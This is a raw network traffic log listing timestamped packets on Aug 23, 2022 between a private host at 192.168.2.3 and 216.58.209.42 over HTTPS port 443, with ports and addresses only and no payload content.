Aug 23, 2022 18:24:47.432938099 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.432980061 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.434263945 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.434298038 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.437865019 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.437906027 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.439929008 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.439973116 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.442259073 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.442306042 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.444750071 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.444789886 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.447285891 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.447338104 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.449325085 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.449384928 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.451821089 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.451864958 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.454474926 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.454547882 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.457066059 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.457108021 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.459096909 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.459131002 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.461735964 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.461762905 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.463846922 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.463877916 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.466506958 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.466535091 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.468668938 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.468704939 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.470858097 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.470889091 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.474041939 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.474072933 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.475691080 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.475711107 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.477982998 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.478039980 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.480703115 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.480737925 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.482682943 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.482705116 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.485553026 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.485582113 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.487695932 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.487718105 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.489929914 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.489948988 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.492667913 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.492708921 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.495115042 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.495151043 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.496985912 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.497009993 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.501281977 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.501326084 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.501688004 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.501714945 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.504465103 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.504498005 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.506746054 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.506768942 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.509001017 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.509025097 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.511617899 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.511651993 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.513866901 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.513890028 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.516381025 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.516415119 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.521636009 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.521687984 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.521718025 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.521744967 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.523145914 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.523236036 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.526079893 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.526119947 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.527968884 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.528008938 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.530627012 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.530663967 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.533374071 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.533401012 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.535165071 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.535192966 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.536873102 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:47.537144899 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:47.537483931 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:47.537514925 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.537552118 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.537834883 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:47.538639069 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:47.538899899 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:47.539149046 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:47.539758921 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.539797068 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.539799929 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:47.540132046 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:47.540410995 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:47.541043997 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:47.542680979 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.542716026 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.544605970 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.544661045 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.547147036 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.547194958 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.549714088 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.549813032 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.551987886 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.552026033 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.554316044 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.554358959 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.556539059 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.556579113 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.558119059 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.558178902 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.560331106 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.560384989 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.563008070 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.563039064 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.565021992 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.565074921 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.566716909 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.566747904 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.568664074 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.568923950 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.570679903 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.570772886 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.572432041 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.572478056 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.573780060 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:47.574075937 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.574106932 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.575958967 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.576018095 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.577285051 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:47.578187943 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.578249931 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.579979897 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.580027103 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.581897020 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.581950903 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.583839893 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.583911896 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.585844040 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.585900068 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.587635994 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.587702036 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.589332104 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:47.589937925 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.590001106 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.591478109 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.591516018 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.593277931 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.593322039 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.594540119 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.594594002 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.597369909 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:47.597417116 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:47.597832918 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:47.597930908 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.597961903 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.601700068 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.601741076 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.605314970 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.605365038 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.607954979 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.608005047 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.609977961 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.610042095 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.613962889 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.614013910 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.617005110 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.617103100 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.620336056 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.620369911 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.622181892 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.622219086 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.624867916 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.624905109 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.627226114 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.627257109 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.630110025 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.630141020 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.631155014 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.631184101 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.633296013 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.633367062 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.635844946 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.635920048 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.638523102 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.638557911 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.640599966 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.640659094 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.642435074 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.642476082 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.644570112 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.644599915 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.647079945 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.647130966 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.649255991 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.649303913 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.651390076 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.651448965 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.654237986 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.654282093 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.655678988 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.655740023 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.657969952 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.658019066 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.660325050 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.660444021 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.661190987 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:47.661725998 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:47.662156105 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:47.662363052 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.662410975 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.662564039 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:47.663497925 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:47.664038897 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:47.664661884 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.664691925 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.667105913 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.667140961 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.669981956 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.670016050 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.671449900 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.671489000 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.673435926 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.673472881 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.676070929 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.676103115 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.678195953 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.678232908 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.680221081 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.680268049 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.681608915 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.681641102 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.683940887 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.683994055 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.687074900 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.687112093 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.689002991 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.689101934 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.691318989 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.691400051 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.693414927 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.693459988 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.696274042 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.696321964 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.698105097 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.698154926 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.700666904 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.700752974 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.703254938 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.703294039 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.704649925 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.704687119 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.706919909 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.706958055 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.709108114 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.709167004 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.709826946 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:47.710444927 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:47.710459948 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:47.710721016 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:47.711280107 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.711308956 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.711335897 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:47.714371920 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.714406013 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.715851068 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.715882063 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.718096972 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.718137026 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.720695972 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.720724106 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.723001003 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.723041058 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.725219965 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.725260973 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.726805925 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.726844072 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.729636908 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.729664087 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.730289936 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.730319023 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.733601093 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.733634949 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.735893965 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.735929012 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.737999916 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.738039017 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.740286112 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.740340948 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.742882967 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.742919922 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.745157957 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.745224953 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.747342110 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.747395039 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.749722958 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.749754906 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.751404047 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.751446962 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.753578901 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.753626108 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.755722046 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.755757093 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.758133888 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.758172989 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.758213043 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:47.758645058 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:47.758934975 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:47.759219885 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:47.760333061 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.760370016 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.761857986 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:47.762809992 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.762993097 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.765166998 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.765217066 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.766937971 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.766966105 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.769181967 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.769212008 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.770754099 CEST	51105	443	192.168.2.3	216.58.209.42
Aug 23, 2022 18:24:47.771425962 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.771459103 CEST	443	51105	216.58.209.42	192.168.2.3
Aug 23, 2022 18:24:47.774216890 CEST	443	51105	216.58.209.42	192.168.2.3
